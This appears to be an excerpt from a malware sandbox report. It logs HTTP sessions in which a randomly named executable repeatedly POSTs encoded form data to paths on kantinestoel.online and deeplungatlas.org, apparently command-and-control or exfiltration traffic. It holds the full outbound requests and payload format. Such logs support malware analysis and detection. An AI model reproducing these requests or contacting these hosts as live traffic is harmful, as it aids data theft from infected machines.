                                                                                                                                  Host: www.tesetturhanzade.xyz
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:52:59.414334059 CET225INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.14.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:52:59 GMT
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close
                                                                                                                                  X-Rate-Limit-Limit: 5s
                                                                                                                                  X-Rate-Limit-Remaining: 19
                                                                                                                                  X-Rate-Limit-Reset: 2024-11-07T11:53:04.2662658Z


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.44981091.184.0.200804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:14.669486046 CET615OUTPOST /ggvc/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.kantinestoel.online
                                                                                                                                  Origin: http://www.kantinestoel.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.kantinestoel.online/ggvc/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 72 79 6e 69 78 4c 6d 32 72 58 55 50 4b 58 63 34 54 5a 47 54 70 67 69 65 46 46 33 4d 56 2f 57 56 37 4e 51 71 73 69 6a 58 68 49 37 38 54 39 41 6d 43 65 4b 68 31 43 5a 34 56 64 58 4a 31 58 75 77 45 56 6b 75 6e 39 57 76 7a 35 36 78 51 38 6f 4c 41 4e 56 68 45 42 44 4e 77 62 54 57 47 53 30 59 52 5a 76 53 65 71 54 44 56 53 79 50 53 59 6f 47 39 78 4e 6e 62 43 4b 7a 57 6e 64 5a 42 46 49 48 52 62 63 43 6e 2b 54 76 74 54 77 2b 79 47 53 78 48 65 72 71 30 70 41 43 65 6d 55 75 52 62 6d 7a 46 62 31 49 4f 68 4c 41 75 68 49 59 42 31 79 41 4c 32 78 67 58 77 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq0pACemUuRbmzFb1IOhLAuhIYB1yAL2xgXw==
                                                                                                                                  Nov 7, 2024 12:53:15.472966909 CET500INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:15 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Content-Length: 196
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.44982591.184.0.200804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:17.210393906 CET635OUTPOST /ggvc/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.kantinestoel.online
                                                                                                                                  Origin: http://www.kantinestoel.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.kantinestoel.online/ggvc/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 74 53 33 69 30 6f 4f 32 74 33 55 41 55 48 63 34 63 35 47 66 70 67 65 65 46 45 7a 63 56 4d 69 56 37 76 49 71 76 6e 50 58 69 49 37 38 59 64 41 5a 64 4f 4c 74 31 43 56 61 56 59 58 4a 31 55 53 77 45 56 55 75 6e 4d 57 73 68 35 36 76 5a 63 6f 4a 64 64 56 68 45 42 44 4e 77 62 76 38 47 53 38 59 52 70 66 53 65 49 72 45 59 79 79 51 43 49 6f 47 73 68 4e 6a 62 43 4c 57 57 6c 6f 2b 42 48 41 48 52 66 4d 43 6e 76 54 67 6b 54 77 77 38 6d 54 4f 4a 2b 36 6c 78 6f 4e 6b 61 6c 4e 56 51 72 6d 4f 4a 39 34 53 66 51 71 58 38 68 73 72 63 79 37 30 47 31 4d 70 4d 39 70 56 47 31 45 45 77 58 73 37 30 61 70 65 32 75 33 34 45 61 34 3d
                                                                                                                                  Data Ascii: NBfdCRyH=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVMiV7vIqvnPXiI78YdAZdOLt1CVaVYXJ1USwEVUunMWsh56vZcoJddVhEBDNwbv8GS8YRpfSeIrEYyyQCIoGshNjbCLWWlo+BHAHRfMCnvTgkTww8mTOJ+6lxoNkalNVQrmOJ94SfQqX8hsrcy70G1MpM9pVG1EEwXs70ape2u34Ea4=
                                                                                                                                  Nov 7, 2024 12:53:18.050215960 CET500INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:17 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Content-Length: 196
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.44984091.184.0.200804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:19.756978989 CET10717OUTPOST /ggvc/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.kantinestoel.online
                                                                                                                                  Origin: http://www.kantinestoel.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.kantinestoel.online/ggvc/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 74 53 33 69 30 6f 4f 32 74 33 55 41 55 48 63 34 63 35 47 66 70 67 65 65 46 45 7a 63 56 4d 36 56 36 61 55 71 31 41 62 58 6a 49 37 38 62 64 41 63 64 4f 4b 33 31 42 6c 65 56 59 72 33 31 52 65 77 46 32 63 75 68 35 32 73 72 35 36 76 62 63 6f 49 41 4e 56 4f 45 42 54 4a 77 61 44 38 47 53 38 59 52 76 37 53 4f 4b 54 45 4c 69 79 50 53 59 6f 77 39 78 4d 45 62 42 36 72 57 6c 73 45 42 32 67 48 57 2f 63 43 6c 5a 50 67 76 54 77 79 37 6d 54 57 4a 2b 33 6c 78 73 74 2f 61 6d 51 64 51 70 36 4f 59 71 45 4d 47 44 71 74 6d 77 38 52 45 41 37 2b 43 58 59 61 49 50 35 30 58 77 51 59 73 33 68 55 33 4e 38 6b 6a 65 50 76 57 66 5a 64 63 2f 6e 37 6c 48 58 74 6b 61 31 54 6a 38 7a 6c 67 77 56 37 31 35 71 68 6b 7a 6b 39 4f 4e 73 54 70 51 4d 45 2b 4e 41 38 6c 58 48 4c 42 32 54 77 6d 31 6f 38 31 74 52 64 37 54 74 4b 6f 35 7a 65 59 58 4c 39 54 48 50 51 73 54 59 39 74 6e 45 64 32 70 77 62 44 31 64 34 69 4a 75 76 58 6c 30 34 52 55 58 4b 67 6a 4d 59 50 50 56 77 47 38 56 37 45 [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVM6V6aUq1AbXjI78bdAcdOK31BleVYr31RewF2cuh52sr56vbcoIANVOEBTJwaD8GS8YRv7SOKTELiyPSYow9xMEbB6rWlsEB2gHW/cClZPgvTwy7mTWJ+3lxst/amQdQp6OYqEMGDqtmw8REA7+CXYaIP50XwQYs3hU3N8kjePvWfZdc/n7lHXtka1Tj8zlgwV715qhkzk9ONsTpQME+NA8lXHLB2Twm1o81tRd7TtKo5zeYXL9THPQsTY9tnEd2pwbD1d4iJuvXl04RUXKgjMYPPVwG8V7E2tTPHb+K4pcwq9A/LOoYH0tjDkwGWcu8HDRspo1djydm7s4yY6A4HYJ/oIfFWHVLyL5ydmvnNtjUuCtN23z1u/R9XHAHYyu652g65efmJVkJbzVLrgUYnrOLGzXARP53MRZa8BO71i8cVEHsnzEIYBq1sgDf6027FKRSx4oA6Qg0O8X31bOBlt8G4MeOGd7vsXfx/P4hErQeqcoxIMDAQ4hz15w0Zr1ewA2hsEgwUix8CKM7H64MS8MCBiUH13CBewAVcK+OGQH61WOzqq63HsvkXMH65GgXSWYwmCaSGeBwiEMAx74QpZ72aNRzw0VFN3y6QgOBiOYBFnZGdLut4s7Aitod29i0aW0UE3gHpZOUN5EcOlmFFTyUYc+6RtAX5gAJVdPvHsXZOF+Wi6JOg7KEEIdRxu+FdaDX+c0CtBq5ZXUcK09rHtPGqGVUxFgMZStMuJs7POVOwbKRcGaOIYVovVwuDI+Faq6jezP6g2wlEOuicDexQEzxENUJdhcrRSn7BWTRJ3NUkHGtHI01T7cMWM5QXkfIh6LsohC1r9aJi18lHIU8Th9+Xhsax+Jw/EQe1p+k/n/93wgF3+a7D2H5S2CI/ZY4YYYHxLT7FHLbzCZ4oAivD4p6dfXNk22dml7IXmsY4//tlZoe+ZWW3U3klMAxEhxARt [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:20.570370913 CET500INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:20 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Content-Length: 196
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.44985691.184.0.200804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:22.300291061 CET341OUTGET /ggvc/?NBfdCRyH=8JknlPcTs2UijknQ0bOQpmN1M0hHcLDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1pP+ZXcAQJvFFEy7R+vzIZC0KJff7IqPUUhg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.kantinestoel.online
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:53:23.110702991 CET500INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:22 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Content-Length: 196
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.449888194.9.94.85804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:28.372756004 CET609OUTPOST /57zf/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.deeplungatlas.org
                                                                                                                                  Origin: http://www.deeplungatlas.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.deeplungatlas.org/57zf/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 46 63 56 6b 51 4d 4a 55 50 57 4c 72 33 6c 64 5a 35 44 31 41 59 4f 36 6d 74 74 37 7a 5a 69 54 4f 57 62 35 37 31 4a 67 73 4d 31 54 75 65 49 6d 38 42 4b 2b 41 6c 44 69 70 6a 54 31 76 58 77 64 66 58 4d 46 76 37 56 4b 4d 31 59 61 4a 5a 4f 76 63 4c 6e 73 59 66 4b 70 64 43 51 39 46 77 4a 33 54 77 6a 57 4d 47 79 77 53 78 47 4e 38 49 59 4e 46 4f 67 44 45 62 36 76 77 38 6c 39 32 6d 55 68 4c 50 6b 72 73 66 6a 39 7a 72 74 75 58 4a 51 32 6a 6c 43 67 62 47 6e 69 50 64 52 61 5a 6a 49 72 73 39 67 49 62 6d 4f 6e 56 5a 69 72 42 44 68 34 47 34 58 76 52 39 67 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=cQ/jsRtgtxwgFcVkQMJUPWLr3ldZ5D1AYO6mtt7zZiTOWb571JgsM1TueIm8BK+AlDipjT1vXwdfXMFv7VKM1YaJZOvcLnsYfKpdCQ9FwJ3TwjWMGywSxGN8IYNFOgDEb6vw8l92mUhLPkrsfj9zrtuXJQ2jlCgbGniPdRaZjIrs9gIbmOnVZirBDh4G4XvR9g==
                                                                                                                                  Nov 7, 2024 12:53:29.231208086 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:29 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/8.1.29
                                                                                                                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                                                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:29.231224060 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                                                                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                                                                                  Nov 7, 2024 12:53:29.231231928 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                                                                                                  Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                                                                                  Nov 7, 2024 12:53:29.231241941 CET636INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                                                                                                  Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                                                                                  Nov 7, 2024 12:53:29.231249094 CET1236INData Raw: 67 65 73 20 69 6e 63 6c 75 64 65 20 65 76 65 72 79 74 68 69 6e 67 20 79 6f 75 20 6e 65 65 64 20 74 6f 20 67 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20
                                                                                                                                  Data Ascii: ges include everything you need to get started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_
                                                                                                                                  Nov 7, 2024 12:53:29.231257915 CET242INData Raw: 3e 3c 62 72 20 2f 3e 0a 09 09 09 09 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75
                                                                                                                                  Data Ascii: ><br /><p><a href="https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.449903194.9.94.85804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:30.915663004 CET629OUTPOST /57zf/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.deeplungatlas.org
                                                                                                                                  Origin: http://www.deeplungatlas.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.deeplungatlas.org/57zf/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 48 34 70 6b 41 66 52 55 59 47 4c 71 72 31 64 5a 69 7a 31 45 59 4f 32 6d 74 6f 66 6a 61 57 2f 4f 58 2b 46 37 30 4e 30 73 50 31 54 75 56 6f 6d 44 4d 71 2b 78 6c 45 71 58 6a 51 74 76 58 77 5a 66 58 4a 68 76 36 6a 43 50 31 49 61 4c 57 75 76 65 57 33 73 59 66 4b 70 64 43 51 5a 76 77 4a 76 54 77 7a 6d 4d 55 44 77 54 79 47 4e 2f 42 34 4e 46 4b 67 44 41 62 36 76 43 38 6e 4a 51 6d 58 5a 4c 50 6b 37 73 47 58 52 77 6c 64 75 52 58 67 33 47 6a 48 4e 6f 4f 55 75 4f 64 52 65 74 72 70 33 67 78 47 46 42 33 2f 47 43 4c 69 50 79 65 6d 78 79 31 55 53 59 6d 68 37 48 73 44 36 36 6a 4b 6c 6b 6b 4e 7a 70 6f 4b 52 4e 4d 70 45 3d
                                                                                                                                  Data Ascii: NBfdCRyH=cQ/jsRtgtxwgH4pkAfRUYGLqr1dZiz1EYO2mtofjaW/OX+F70N0sP1TuVomDMq+xlEqXjQtvXwZfXJhv6jCP1IaLWuveW3sYfKpdCQZvwJvTwzmMUDwTyGN/B4NFKgDAb6vC8nJQmXZLPk7sGXRwlduRXg3GjHNoOUuOdRetrp3gxGFB3/GCLiPyemxy1USYmh7HsD66jKlkkNzpoKRNMpE=
                                                                                                                                  Nov 7, 2024 12:53:31.750181913 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
